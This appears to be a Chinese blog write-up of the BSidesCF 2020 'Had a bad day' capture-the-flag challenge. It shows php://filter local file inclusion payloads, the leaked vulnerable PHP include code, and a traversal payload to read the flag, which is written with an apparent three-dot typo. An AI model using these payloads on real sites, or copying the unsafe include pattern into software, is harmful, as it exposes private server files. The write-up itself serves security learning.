[BSidesCF 2020]Had a bad day
[BSidesCF 2020]Had a bad day
打开网站有两个按钮,点击之后链接后都会加上?category=meowers
猜测有文件包含漏洞,尝试?category=php://filter/read=convert.base64-encode/resource=index.php
警告中看到 .php出现了两次,推测源码中存在.php拼接,于是去掉.php
得到PHP源码
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
观察源码发现,传入的category参数中需要有woofers、meowers和index才能包含传入以传入名为文件名的文件
因此修改Payload为?category=php://filter/convert.base64-encode/resource=index/.../flag
分类:
网安 / 题库 / BUU
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具